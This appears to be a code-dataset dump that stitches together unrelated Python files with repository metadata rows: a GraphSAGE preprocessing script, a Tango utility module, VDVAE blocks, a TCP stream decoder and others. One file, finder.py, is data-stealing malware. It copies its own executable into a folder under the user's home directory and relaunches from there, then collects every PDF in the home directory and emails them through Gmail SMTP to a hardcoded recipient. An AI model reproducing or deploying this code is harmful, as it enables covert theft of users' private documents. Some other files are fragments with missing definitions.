        # `print x` statement was Python-2-only syntax.
        print(result['Message'])
        return
    # `in` replaces dict.has_key(), which was removed in Python 3.
    if metaname in result['Value']:
        return result['Value'][metaname]
# Script entry point. NOTE(review): `main` is not defined in this fragment;
# confirm it exists elsewhere in the file.
if __name__ == '__main__':
    main()
| 25.923077 | 96 | 0.557864 |
0b39211e58c62524837539f8c02eb738f733141e | 1,037 | py | Python | GraphSAGE/fix.py | attre2vec/attre2vec | f36a2581f3d17887d6201a76624d4ced93d6503f | [
"MIT"
] | null | null | null | GraphSAGE/fix.py | attre2vec/attre2vec | f36a2581f3d17887d6201a76624d4ced93d6503f | [
"MIT"
] | null | null | null | GraphSAGE/fix.py | attre2vec/attre2vec | f36a2581f3d17887d6201a76624d4ced93d6503f | [
"MIT"
] | null | null | null | import pickle
import networkx as nx
import numpy as np
import torch
# For each citation dataset, export the edge-derived node features and the
# per-split training-node lists in the formats the GraphSAGE code expects.
for name in ('cora', 'citeseer', 'pubmed'):
    with open(f'data/datasets/{name}.pkl', 'rb') as fin:
        dataset = pickle.load(fin)
    test_graph = dataset['original_graph']
    e2i = dataset['edge2idx']
    H = dataset['H']
    # Build 128-dim node features from the edge rows: the 3:-1 slice of each
    # row is split into two halves, one per endpoint.
    # NOTE(review): a node touched by several edges keeps the values of the
    # last edge visited -- confirm this overwrite is intended.
    node_fts = torch.zeros((test_graph.number_of_nodes(), 128))
    for u, v in test_graph.edges():
        ef = H[e2i[(u, v)]][3:-1]
        node_fts[u] = ef[:128]
        node_fts[v] = ef[128:]
    # Collect the unique endpoints of each split's training edges in
    # first-seen order. A `seen` set replaces the original `u not in tn`
    # list scans, which made this loop O(n^2) in the number of edges.
    train_nodes = []
    for idx in range(dataset['num_datasets']):
        tn = []
        seen = set()
        for u, v in dataset['Xy'][idx]['train']['X']:
            if u not in seen:
                seen.add(u)
                tn.append(u)
            if v not in seen:
                seen.add(v)
                tn.append(v)
        train_nodes.append(tn)
    nx.write_edgelist(test_graph, f'GraphSAGE/data/{name}.edgelist')
    np.save(f'GraphSAGE/data/{name}-node-features', node_fts.numpy())
    with open(f'GraphSAGE/data/{name}-train-nodes.pkl', 'wb') as fout:
        pickle.dump(train_nodes, fout)
| 25.925 | 70 | 0.580521 |
0b3963c63ed1877c12683ef9458a7f962df91e0e | 3,243 | py | Python | finder.py | giuseppebrb/Pynder | a47defc08ff497096a1fe507ab5d7b01997b69ef | [
"MIT"
] | 3 | 2017-11-11T01:19:57.000Z | 2021-07-07T15:44:32.000Z | finder.py | giuseppebrb/Pynder | a47defc08ff497096a1fe507ab5d7b01997b69ef | [
"MIT"
] | null | null | null | finder.py | giuseppebrb/Pynder | a47defc08ff497096a1fe507ab5d7b01997b69ef | [
"MIT"
] | null | null | null | import os
import fnmatch
import smtplib
import email.mime.application
import sys
import subprocess
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from pathlib import Path
home = str(Path.home()) # Return a string representing the users home directory
fileFound = 0 # Number of files found while discovering
fileScanned = 0 # Number of the already processed files
maxSize = 23068672 # Attachments bytes limit for the mail host (22MB in byte, but it can be changed)
actualSizeCounter = 0 # Bytes count for files already attached to the email
paths = [] # List of files directories, matching the pattern, that will be print into the email body
# Following values need to be changed
email_user = "SENDER-ADDRESS-HERE"
email_pwd = "SENDER-PASSWORD-HERE"
recipient = "RECIPIENT-ADDRESS-HERE"
"""
This function will return a list of strings which represents the files path with the specified extension inside the
specified path
"""
"""
__________ START - It may NOT work on MacOS __________
| |
"""
injecting_folder = home+'\\script' # 'Injecting' folder
if not os.path.exists(injecting_folder):
    # NOTE(review): unquoted shell interpolation -- a home path containing
    # spaces breaks this; os.makedirs() would avoid the shell entirely.
    os.system("mkdir %s" % injecting_folder)
# Locate this program's own executable next to the running script.
executableLocation = find('EXECUTABLE-NAME-HERE.exe', os.path.dirname(os.path.abspath(__file__)))
# Create a new 'injecting' folder where software will copy itself
if not os.path.isfile(injecting_folder + "\\EXECUTABLE-NAME-HERE.exe"):
    # NOTE(review): the same unquoted-path concern applies to this xcopy call.
    os.system("xcopy {!s} {!s} /R".format(executableLocation[0], injecting_folder))
# If current working directory is not the 'injecting' folder opens a new instance from there and close this one.
if os.getcwd() != injecting_folder:
    os.chdir(injecting_folder)
    subprocess.Popen([injecting_folder+'\\EXECUTABLE-NAME-HERE.exe'], stdin=None, stdout=None, stderr=None)
    sys.exit()
"""
|__________ END - It may NOT work on MacOS __________|
"""
filesFound = find("*.pdf", home) # List of every pdf file found in every folder starting from the user's home directory
# Building the email structure
msg = MIMEMultipart()
msg['From'] = email_user
msg['To'] = recipient
msg['Subject'] = "Files Found"
# Attach every PDF found, recording its path for the message body.
# NOTE(review): attachments are added unconditionally -- the maxSize limit
# declared above is never enforced here.
for f in filesFound:
    fp = open(r'%s' % f, 'rb')
    att = email.mime.application.MIMEApplication(fp.read())
    fp.close()
    paths.append("Directory: " + f)
    att.add_header('Content-Disposition', 'attachment; filename="%s"' % f)
    msg.attach(att)
for p in paths:
    msg.attach(MIMEText(p, 'plain'))
# Open the connection with mail host with specified credentials
server = smtplib.SMTP('smtp.gmail.com', 587) # These values are just an example working with Gmail, you need to change
# them with your own host's SMTP address and port
server.ehlo()
server.starttls() # Starts a secure tls connection
server.login(email_user, email_pwd)
email_body = msg.as_string()
server.sendmail(email_user, recipient, email_body) # Send the email
server.quit() # Close the connection with host
sys.exit() # Quit program
| 35.25 | 120 | 0.716929 |
0b3b1b7fa53f607bfa6820806f9bdec88c43a29d | 2,092 | py | Python | sushy/tests/unit/resources/fabric/test_endpoint.py | sapcc/sushy | 7016cc0f31050ab656e1e26c80bd44ce3e9fd57a | [
"Apache-2.0"
] | 37 | 2017-03-24T10:17:37.000Z | 2022-02-10T19:42:26.000Z | sushy/tests/unit/resources/fabric/test_endpoint.py | sapcc/sushy | 7016cc0f31050ab656e1e26c80bd44ce3e9fd57a | [
"Apache-2.0"
] | 4 | 2020-07-08T10:53:30.000Z | 2020-07-30T11:56:20.000Z | sushy/tests/unit/resources/fabric/test_endpoint.py | sapcc/sushy | 7016cc0f31050ab656e1e26c80bd44ce3e9fd57a | [
"Apache-2.0"
] | 29 | 2017-07-19T21:28:06.000Z | 2021-06-09T05:20:32.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
from unittest import mock
import sushy
from sushy.resources.fabric import endpoint
from sushy.tests.unit import base
| 40.230769 | 78 | 0.68021 |
0b3d35d3fa9e0c6688b8c47ccf07458bfaa3bde8 | 231 | py | Python | engine/core/it_singleton.py | torrotitans/torro_community | a3f153e69a860f0d6c831145f529d9e92193a0ae | [
"MIT"
] | 1 | 2022-01-12T08:31:59.000Z | 2022-01-12T08:31:59.000Z | engine/core/it_singleton.py | torrotitans/torro_community | a3f153e69a860f0d6c831145f529d9e92193a0ae | [
"MIT"
] | null | null | null | engine/core/it_singleton.py | torrotitans/torro_community | a3f153e69a860f0d6c831145f529d9e92193a0ae | [
"MIT"
] | 2 | 2022-01-19T06:26:32.000Z | 2022-01-26T15:25:15.000Z | #!/usr/bin/python
# -*- coding: UTF-8 -*
from db.it.db_it_mgr import it_mgr
# Public export list. NOTE(review): written as a set rather than the
# conventional list, and the `itSingleton` class is not visible in this
# fragment -- presumably defined between these lines in the full file.
__all__ = {"itSingleton"}
# Module-level singleton instance shared by all importers.
it_singleton = itSingleton()
| 13.588235 | 38 | 0.670996 |
0b3f444aab07f3ace7008a9a2f44f279835a4a8e | 25,437 | py | Python | analyses/seasonality_paper_st/lai_only/shap_interaction/model_analysis_shap_interaction_1.py | akuhnregnier/wildfire-analysis | a04deada145cec864051d2fb15aec1a53a0246b9 | [
"MIT"
] | null | null | null | analyses/seasonality_paper_st/lai_only/shap_interaction/model_analysis_shap_interaction_1.py | akuhnregnier/wildfire-analysis | a04deada145cec864051d2fb15aec1a53a0246b9 | [
"MIT"
] | null | null | null | analyses/seasonality_paper_st/lai_only/shap_interaction/model_analysis_shap_interaction_1.py | akuhnregnier/wildfire-analysis | a04deada145cec864051d2fb15aec1a53a0246b9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from pathlib import Path
from wildfires.utils import handle_array_job_args
try:
# This will only work after the path modification carried out in the job script.
from specific import (
CACHE_DIR,
SimpleCache,
get_model,
data_split_cache,
get_shap_values,
)
except ImportError:
"""Not running as an HPC job yet."""
if __name__ == "__main__":
handle_array_job_args(
Path(__file__).resolve(),
func,
ncpus=1,
mem="7gb",
walltime="11:00:00",
max_index=1734,
)
| 14.16314 | 84 | 0.298306 |
0b3f95c97639b3abd555db4e30fef992d56dda30 | 1,954 | py | Python | tests/test_res_grp_config.py | danos/vplane-config-npf | 2103ac7e19ee77eacff30a3d11cf487dfbefee26 | [
"BSD-3-Clause"
] | null | null | null | tests/test_res_grp_config.py | danos/vplane-config-npf | 2103ac7e19ee77eacff30a3d11cf487dfbefee26 | [
"BSD-3-Clause"
] | null | null | null | tests/test_res_grp_config.py | danos/vplane-config-npf | 2103ac7e19ee77eacff30a3d11cf487dfbefee26 | [
"BSD-3-Clause"
] | 2 | 2020-05-27T10:34:20.000Z | 2021-01-20T05:40:32.000Z | #!/usr/bin/env python3
# Copyright (c) 2019, AT&T Intellectual Property.
# All rights reserved.
#
# SPDX-License-Identifier: LGPL-2.1-only
#
"""
Unit-tests for the qos_config.py module.
"""
from vyatta.res_grp.res_grp_config import ResGrpConfig
# Canned config subtree mirroring the Vyatta YANG resources tree: four DSCP
# groups ("group-a".."group-d"), each holding a contiguous block of 16 DSCP
# values covering 0-63 in total.
TEST_DATA = {
    'vyatta-resources-v1:resources': {
        'vyatta-resources-group-misc-v1:group': {
            'vyatta-resources-dscp-group-v1:dscp-group': [
                {
                    'group-name': 'group-a',
                    'dscp': [
                        '0', '1', '2', '3', '4', '5', '6', '7', '8',
                        '9', '10', '11', '12', '13', '14', '15'
                    ]
                }, {
                    'group-name': 'group-b',
                    'dscp': [
                        '16', '17', '18', '19', '20', '21', '22', '23',
                        '24', '25', '26', '27', '28', '29', '30', '31'
                    ]
                }, {
                    'group-name': 'group-c',
                    'dscp': [
                        '32', '33', '34', '35', '36', '37', '38', '39',
                        '40', '41', '42', '43', '44', '45', '46', '47'
                    ]
                }, {
                    'group-name': 'group-d',
                    'dscp': [
                        '48', '49', '50', '51', '52', '53', '54', '55',
                        '56', '57', '58', '59', '60', '61', '62', '63'
                    ]
                }
            ]
        }
    }
}
def test_rgconfig():
    """ Simple unit-test for the ResGrpConfig class """
    config = ResGrpConfig(TEST_DATA)
    assert config is not None
    assert len(config.dscp_groups) == 4
    # All four configured groups resolve; an unknown name does not.
    for group_name in ("group-a", "group-b", "group-c", "group-d"):
        assert config.get_dscp_group(group_name) is not None
    assert config.get_dscp_group("group-e") is None
| 32.566667 | 71 | 0.413511 |
0b4263d7f857ffd13d9244963a213a2d55a3ea6f | 36,145 | py | Python | fandango/objects.py | rhomspuron/fandango | 51cc7659dfa7ea8c5890a993bbcc4c2049e45136 | [
"CC-BY-3.0"
] | null | null | null | fandango/objects.py | rhomspuron/fandango | 51cc7659dfa7ea8c5890a993bbcc4c2049e45136 | [
"CC-BY-3.0"
] | null | null | null | fandango/objects.py | rhomspuron/fandango | 51cc7659dfa7ea8c5890a993bbcc4c2049e45136 | [
"CC-BY-3.0"
] | null | null | null | #!/usr/bin/env python2.5
#############################################################################
##
## file : objects.py
##
## description : see below
##
## project : Tango Control System
##
## $Author: srubio@cells.es, tcoutinho@cells.es, homs@esrf.fr $
##
##
## $Revision: 2008 $
##
## copyleft : ALBA Synchrotron Controls Section, CELLS
## Bellaterra
## Spain
##
#############################################################################
##
## This file is part of Tango Control System
##
## Tango Control System is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as published
## by the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
##
## Tango Control System is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, see <http://www.gnu.org/licenses/>.
###########################################################################
"""
fandango.objects contains method for loading python modules and objects
"on the run", as well as several advanced types used within fandango library
Struct, Decorator and Cached are fundamental types for all fandango API's
It includes 2 wonderful classes: Object (by Alejandro Homs)
and Singleton (by Marc Santiago)
Enum classes are borrowed from taurus.core.utils (by Tiago Coutinho)
"""
import __builtin__
from __builtin__ import object
import traceback
from fandango.functional import *
from operator import isCallable, isSequenceType
from collections import Hashable
from types import MethodType
import threading
import functools
#Python 2-3 conundrum
try:
import queue
import queue as Queue
except:
import Queue
import Queue as queue
try:
from collections import namedtuple #Only available since python 2.6
except:
namedtuple = None
## Inspection methods
def copy(obj):
    """
    Return a copy of a python primitive object.

    Objects exposing a ``copy()`` method are copied through it; otherwise
    the object's own type is used as a copy constructor, first trying the
    keyword form ``T(other=obj)`` and falling back to ``T(obj)``. Class
    instances therefore need an ``__init__(other)`` (or single-argument)
    constructor for this to work.
    """
    if hasattr(obj, 'copy'):
        return obj.copy()
    try:
        return type(obj)(other=obj)
    except:
        return type(obj)(obj)
##############################################################################
# Methods for pickling/dumping, passing objects to files/queues
def obj2dict(obj,type_check=True,class_check=False,fltr=None):
    """
    Converts a python object to a dictionary with all its members
    as python primitives.

    Callable attributes and dunder names are always skipped; with
    `type_check` enabled, values of non-builtin types are coerced (dicts
    are shallow-copied, everything else str()-ed).
    This can be used in Queues or to convert to str using pickle.dumps.

    :param obj: any python object
    :param type_check: coerce non-builtin values to str/dict
    :param class_check: also record __class__/__bases__/__base__ names
    :param fltr: a callable(name):bool method; names failing it are skipped
    """
    dct = {}
    try:
        for name in dir(obj):
            if fltr and not fltr(name):
                continue
            try:
                attr = getattr(obj,name)
                if hasattr(attr,'__call__'): continue
                if name == 'inited_class_list': continue
                if name.startswith('__'): continue
                if type_check:
                    try:
                        # Only builtin-typed values are kept as-is.
                        if type(attr).__name__ not in dir(__builtin__):
                            if isinstance(attr,dict):
                                attr = dict((k,v) for k,v in attr.items())
                            else:
                                attr = str(attr)
                    except Exception:
                        # Value could not be coerced; drop the attribute.
                        continue
                dct[name] = attr
            except Exception as e:  # was `except Exception,e` (Python-2-only syntax)
                print(e)
        if class_check:
            klass = obj.__class__
            if '__class__' not in dct:
                dct['__class__'] = klass.__name__
            if '__bases__' not in dct:
                dct['__bases__'] = [b.__name__ for b in klass.__bases__]
            if '__base__' not in dct:
                dct['__base__'] = klass.__base__.__name__
    except Exception as e:
        print(e)
    return dct
## Useful class objects
def make_property(var,fget=_fget,fset=_fset,fdel=_fdel):
    """ This Class is in Beta, not fully implemented yet"""
    # Builds a property whose accessors receive the attribute name `var`
    # pre-bound through functools.partial, so one set of template accessors
    # can serve many attributes. NOTE(review): the defaults _fget/_fset/_fdel
    # are not defined in this fragment; confirm they exist at module level.
    return property(partial(fget,var=var),partial(fset,var=var),
        partial(fdel,var=var),doc='%s property'%var)
#class NamedProperty(property):
#"""
#"""
#def __init__(self,name,fget=None,fset=None,fdel=None):
#self.name = name
#mname = '%s%s'%(name[0].upper(),name[1:])
#lname = '%s%s'%(name[0].lower(),name[1:])
#property.__init__(fget,fset,fdel,doc='NamedProperty(%s)'%self._name)
#def get_attribute_name(self):
#return '_%s'self.name
def NamedProperty(name, fget=None, fset=None, fdel=None):  # ,doc=None):
    """
    This Class is in Beta, not fully implemented yet.

    Build a property (descriptor) from name-independent template accessors:
    each supplied accessor receives the attribute identifier through the
    keyword argument ``var``::

        def fget(self, var):        # var identifies the variable
            return getattr(self, var)
        def fset(self, value, var):
            setattr(self, var, value)
        def fdel(self, var):
            delattr(self, var)
        MyObject.X = NamedProperty('X', fget, fset, fdel)
    """
    bound_get = partial(fget, var=name) if fget else None
    bound_set = partial(fset, var=name) if fset else None
    bound_del = partial(fdel, var=name) if fdel else None
    return property(bound_get, bound_set, bound_del, doc=name)
import threading
__lock__ = threading.RLock()
def locked(f, *args, **kwargs):
    """
    decorator for secure-locked functions.

    Runs ``f(*args, **kwargs)`` while holding a lock and returns its result.
    A key-argument _lock can be used to use a custom Lock object; otherwise
    the module-level ``__lock__`` RLock is used. If ``f`` raises, the
    exception is printed and swallowed (None is returned), preserving the
    original best-effort behaviour.
    """
    # Look up the module default lazily so an explicit _lock never touches
    # __lock__ (and _lock=None now falls back to the default instead of
    # crashing on None.acquire()).
    _lock = kwargs.pop('_lock', None)
    if _lock is None:
        _lock = __lock__
    # Acquire *outside* the try block: previously a failed acquire() still
    # reached the finally clause and released a lock that was never held.
    _lock.acquire()
    try:
        return f(*args, **kwargs)
    except Exception as e:  # was the Python-2-only `except Exception,e`
        # print() form works on both Python 2 and 3 (was a py2 print statement).
        print('Exception in%s(*%s,**%s): %s' % (f.__name__, args, kwargs, e))
    finally:
        _lock.release()
def self_locked(func,reentrant=True):
    ''' Decorator to make thread-safe class members
    @deprecated
    @note see in tau.core.utils.containers
    Decorator to create thread-safe objects.
    reentrant: CRITICAL:
        With Lock() this decorator should not be used to decorate nested
        functions; it will cause Deadlock!
        With RLock this problem is avoided ... but you should rely more
        on python threading.
    '''
    #lock_fun.__name__ = func.__name__
    #lock_fun.__doc__ = func.__doc__
    # NOTE(review): `lock_fun` (the wrapping closure) is not defined in this
    # fragment -- as written, calling this raises NameError. The wrapper
    # definition appears to be missing/truncated here; confirm against the
    # full file.
    return lock_fun
###############################################################################
def NewClass(classname, classparent=None, classdict=None):
    """
    Creates a new class on demand::

        ReleaseNumber = NewClass('ReleaseNumber', tuple,
            {'__repr__': (lambda self: '.'.join('%02d' % i for i in self))})

    :param classname: name of the new class
    :param classparent: a base class or a sequence of base classes
        (defaults to object)
    :param classdict: the class namespace dict (defaults to empty)
    """
    bases = classparent
    if bases and not isSequence(bases):
        bases = (bases,)  # wrap a single base class into a tuple
    if not bases:
        bases = (object,)
    return type(classname, bases, classdict if classdict else {})
###############################################################################
###############################################################################
###############################################################################
def decorator_with_args(decorator):
    '''
    Convert a ``d(func, *args, **kwargs)``-style decorator into a
    parameterised decorator factory.

    The result must be used with parenthesis -- ``@decorated()`` -- even
    when no arguments are given! Note: this construction disturbed stdout
    and there are known issues when nesting such decorators; Decorator
    classes are a more robust alternative.
    '''
    def accept_arguments(*args, **kwargs):
        # Capture the decoration arguments, then wait for the function.
        def apply_to(func):
            return decorator(func, *args, **kwargs)
        return apply_to
    return accept_arguments
###########################################################################
## @DEPRECATED!
from . import doc
__doc__ = doc.get_fn_autodoc(__name__,vars())
| 33.938967 | 89 | 0.56135 |
0b42ef18819891116ae94c7d2436b4f0dab7c2b9 | 5,877 | py | Python | vdvae_flax/blocks.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 23,901 | 2018-10-04T19:48:53.000Z | 2022-03-31T21:27:42.000Z | vdvae_flax/blocks.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 891 | 2018-11-10T06:16:13.000Z | 2022-03-31T10:42:34.000Z | vdvae_flax/blocks.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 6,047 | 2018-10-12T06:31:02.000Z | 2022-03-31T13:59:28.000Z | # coding=utf-8
# Copyright 2021 DeepMind Technologies Limited and the Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Building blocks for VDVAE."""
from typing import Optional, Tuple
import chex
from flax import linen as nn
import jax
_NUM_CONV_LAYER_PER_BLOCK = 4
def get_vdvae_convolution(output_channels,
kernel_shape,
weights_scale = 1.,
name = None,
precision = None):
"""Builds a 2D convolution.
Args:
output_channels: number of output channels.
kernel_shape: shape of convolutional kernel.
weights_scale: scale of initial weights in the convolution.
name: name of the module.
precision: jax precision.
Returns:
a nn.Conv2D.
"""
kernel_init = nn.initializers.variance_scaling(
scale=weights_scale, mode='fan_in', distribution='truncated_normal')
return nn.Conv(
features=output_channels,
kernel_size=kernel_shape,
strides=(1, 1),
padding='SAME',
use_bias=True,
kernel_init=kernel_init,
name=name,
precision=precision)
| 35.618182 | 82 | 0.650842 |
0b43e92ff65dfbae4bcf1fe66e16f6008f379b22 | 2,605 | py | Python | test_hrm_code.py | liameirose/bme590hrm | d44573b73b46b121a31667c12bb6add4e8a8daa7 | [
"MIT"
] | null | null | null | test_hrm_code.py | liameirose/bme590hrm | d44573b73b46b121a31667c12bb6add4e8a8daa7 | [
"MIT"
] | 2 | 2018-10-20T22:16:56.000Z | 2018-10-25T23:56:43.000Z | test_hrm_code.py | liameirose/bme590hrm | d44573b73b46b121a31667c12bb6add4e8a8daa7 | [
"MIT"
] | null | null | null | import pytest
import json
import numpy as np
| 26.05 | 69 | 0.621881 |
0b44a978913b26bbf0d8ab188b6560f82d0fe2d3 | 1,068 | py | Python | core/migrations/0044_auto_20190510_0921.py | raheemazeezabiodun/art-backend | 0bc47f3cf6f403101082f201c7fd1ca8108d5731 | [
"MIT"
] | 4 | 2018-03-12T23:49:01.000Z | 2020-07-06T17:37:29.000Z | core/migrations/0044_auto_20190510_0921.py | raheemazeezabiodun/art-backend | 0bc47f3cf6f403101082f201c7fd1ca8108d5731 | [
"MIT"
] | 259 | 2018-02-06T07:53:07.000Z | 2020-06-05T19:18:32.000Z | core/migrations/0044_auto_20190510_0921.py | raheemazeezabiodun/art-backend | 0bc47f3cf6f403101082f201c7fd1ca8108d5731 | [
"MIT"
] | 22 | 2018-01-25T14:02:05.000Z | 2020-06-24T20:37:01.000Z | # Generated by Django 2.1.7 on 2019-05-10 09:21
from django.db import migrations, models
| 38.142857 | 258 | 0.634831 |
0b4772665a5a43688e79771eafbcfa9e4db57a1a | 6,661 | py | Python | postgres_connector/splitters.py | sandboxws/beam-postgres-connector | d08ed08e96991704fc234dd1e4d2ddf13f1885c1 | [
"MIT"
] | null | null | null | postgres_connector/splitters.py | sandboxws/beam-postgres-connector | d08ed08e96991704fc234dd1e4d2ddf13f1885c1 | [
"MIT"
] | null | null | null | postgres_connector/splitters.py | sandboxws/beam-postgres-connector | d08ed08e96991704fc234dd1e4d2ddf13f1885c1 | [
"MIT"
] | null | null | null | import re
from abc import ABCMeta, abstractmethod
from datetime import datetime
from typing import Callable, Iterator
from apache_beam.io import iobase
from apache_beam.io.range_trackers import (LexicographicKeyRangeTracker,
OffsetRangeTracker,
UnsplittableRangeTracker)
from dateutil.relativedelta import relativedelta
class DateSplitter(BaseSplitter):
"""Split bounded source by dates."""
pass
class IdsSplitter(BaseSplitter):
"""Split bounded source by any ids."""
def _validate_query(self):
condensed_query = self.source.query.lower().replace(" ", "")
if re.search(r"notin\({ids}\)", condensed_query):
raise ValueError(f"Not support 'not in' phrase: {self.source.query}")
if not re.search(r"in\({ids}\)", condensed_query):
example = "SELECT * FROM tests WHERE id IN ({ids})"
raise ValueError(f"Require 'in' phrase and 'ids' key on query: {self.source.query}, e.g. '{example}'")
| 37.632768 | 118 | 0.664465 |
0b479dbf807c903d09638149ff0de16acee169e3 | 5,827 | py | Python | apis/python_interface_helpers/stk_env.py | davetrollope-fsml/sequence_toolkit | 49495f679aad1d7c134cf8a189cca1e8acc9f4bd | [
"MIT"
] | null | null | null | apis/python_interface_helpers/stk_env.py | davetrollope-fsml/sequence_toolkit | 49495f679aad1d7c134cf8a189cca1e8acc9f4bd | [
"MIT"
] | null | null | null | apis/python_interface_helpers/stk_env.py | davetrollope-fsml/sequence_toolkit | 49495f679aad1d7c134cf8a189cca1e8acc9f4bd | [
"MIT"
] | null | null | null | from stk_sequence import *
from stk_tcp_server import *
from stk_tcp_client import *
from stk_data_flow import *
from stk_options import stk_clear_cb
import time
| 34.276471 | 104 | 0.763686 |
0b47c0ccbeb35e2ac408d98bd973b27910abd4c8 | 1,163 | py | Python | readfile.py | y-azvd/perceptron | 3cd4cefc7ae54bd8a3df702300ee9797389fef4a | [
"MIT"
] | null | null | null | readfile.py | y-azvd/perceptron | 3cd4cefc7ae54bd8a3df702300ee9797389fef4a | [
"MIT"
] | null | null | null | readfile.py | y-azvd/perceptron | 3cd4cefc7ae54bd8a3df702300ee9797389fef4a | [
"MIT"
] | null | null | null | import numpy as np
##
## @brief function_description
##
## @param filename The filename
##
## @return description_of_the_return_value
##
##
## @brief Reads for perceptron.
##
## @param filename The filename
## @param dataType The data type
##
## @return description_of_the_return_value
##
| 23.26 | 71 | 0.674119 |
0b49a43a85fb689276b933c981268752b4780e5f | 3,255 | py | Python | utils.py | SappieKonig/eind-practicum | d6ef30d233706812334a52b618f4ae00380ba3b7 | [
"MIT"
] | null | null | null | utils.py | SappieKonig/eind-practicum | d6ef30d233706812334a52b618f4ae00380ba3b7 | [
"MIT"
] | null | null | null | utils.py | SappieKonig/eind-practicum | d6ef30d233706812334a52b618f4ae00380ba3b7 | [
"MIT"
] | null | null | null | import numpy as np
import cv2 as cv
import os
import shutil
from skimage.util.shape import view_as_windows
import torch.nn.functional as F
import torch
from functools import lru_cache
| 31.601942 | 112 | 0.663902 |
0b4a7fb8ebee09432022b77e8750863d12e69e9f | 134 | py | Python | python/pangram.py | emiliot/hackerrank | 7a3081f6b0a33f8402c63b94a6a54728a9adf47e | [
"MIT"
] | null | null | null | python/pangram.py | emiliot/hackerrank | 7a3081f6b0a33f8402c63b94a6a54728a9adf47e | [
"MIT"
] | null | null | null | python/pangram.py | emiliot/hackerrank | 7a3081f6b0a33f8402c63b94a6a54728a9adf47e | [
"MIT"
] | null | null | null | s = input().strip()
res = [c for c in set(s.lower()) if c.isalpha()]
if len(res) == 26:
print("pangram")
else:
print("not pangram")
| 19.142857 | 48 | 0.604478 |
0b4ac3436bf4854bb94f737d096d1fe630a754a3 | 8,423 | py | Python | stream.py | ccgcyber/xpcap | a0e6fd1355fd0a9cbff4e074275b236ce8c6c3b8 | [
"MIT"
] | 5 | 2017-07-31T02:07:05.000Z | 2021-02-14T16:39:49.000Z | stream.py | ccgcyber/xpcap | a0e6fd1355fd0a9cbff4e074275b236ce8c6c3b8 | [
"MIT"
] | null | null | null | stream.py | ccgcyber/xpcap | a0e6fd1355fd0a9cbff4e074275b236ce8c6c3b8 | [
"MIT"
] | 4 | 2016-07-24T08:56:54.000Z | 2020-07-12T11:50:02.000Z | from __future__ import print_function
import pkgutil
import stream_decoders
# this module decodes stream based protocols.
# and resolves retransmissions.
decoders= []
# __path__ is used to find the location of all decoder submodules
for impimp, name, ii in pkgutil.iter_modules(stream_decoders.__path__):
impload= impimp.find_module(name)
decoders.append(impload.load_module(name).toplevel)
import math
import time
import struct
# handle with packet reordering
def reorder(self, ctx):
src= addrstring(getaddr(ctx, "src"))
dst= addrstring(getaddr(ctx, "dst"))
# if any(len(x) for x in self.seqmap.values()):
# print(self.seqmap)
# save all pkts in seqmap
if not src in self.seqmap:
self.seqmap[src]= {}
self.seqmap[src][ctx.tcp.seq]= ctx
# then try to process pkts
for k in sorted(self.seqmap[src].keys()):
ctx= self.seqmap[src][k]
if not src in self.seq:
self.seq[src]= ctx.tcp.seq
if not dst in self.seq and ctx.tcp.ack:
self.seq[dst]= ctx.tcp.ack
f= self.tcpflags(ctx.tcp)
skip= 0
extra= ctx.tcp.FIN or ctx.tcp.SYN
endseq= ctx.tcp.seq + len(ctx.tcp.payload)+extra
if not src in self.cur:
self.cur[src]= ctx.tcp.seq
elif self.cur[src] < ctx.tcp.seq:
# gap -> output later
# todo: on FIN: do forward gapped data to protocol.handler.
##print("gap %d" % (ctx.tcp.seq-self.cur[src]))
break
elif self.cur[src] > ctx.tcp.seq:
#print("OVERLAP: %08x-%08x" % (ctx.tcp.seq, self.cur[src]))
# handle retransmit
skip= self.cur[src] - ctx.tcp.seq
##print("retransmitted %d" % skip)
# todo: detect server/client direction
# client: SYN has ctx.tcp.ack==0
# server: SYN has ctx.tcp.ack!=0
#seqnr= "[%08x]" % ctx.tcp.seq-self.seq[src]
seqnr= "[%08x-%08x %08x]" % (ctx.tcp.seq, endseq, ctx.tcp.ack)
print("%s TCP %-45s %s%-2s" % (tsformat(ctx.pcap.ts), pktprefix(ctx.ip, ctx.tcp),
seqnr, f))
if skip < len(ctx.tcp.payload):
# todo: pass server/client flag + source/dest ports
self.protocol.handle(src, ctx.tcp.payload, skip, len(ctx.tcp.payload))
self.cur[src] = endseq
del self.seqmap[src][k]
class StreamManager:
| 32.396154 | 93 | 0.544343 |
0b4afb977af41e7750f169c98501350be4fa6ae6 | 247 | py | Python | app/db/connection.py | melhin/streamchat | 8a3e7ffdcf4bc84045df71259556f4267a755351 | [
"MIT"
] | null | null | null | app/db/connection.py | melhin/streamchat | 8a3e7ffdcf4bc84045df71259556f4267a755351 | [
"MIT"
] | 3 | 2020-09-16T13:30:17.000Z | 2020-09-19T09:56:50.000Z | app/db/connection.py | melhin/streamchat | 8a3e7ffdcf4bc84045df71259556f4267a755351 | [
"MIT"
] | null | null | null | import logging
import aioredis
from app.core.config import REDIS_DSN, REDIS_PASSWORD
logger = logging.getLogger(__name__)
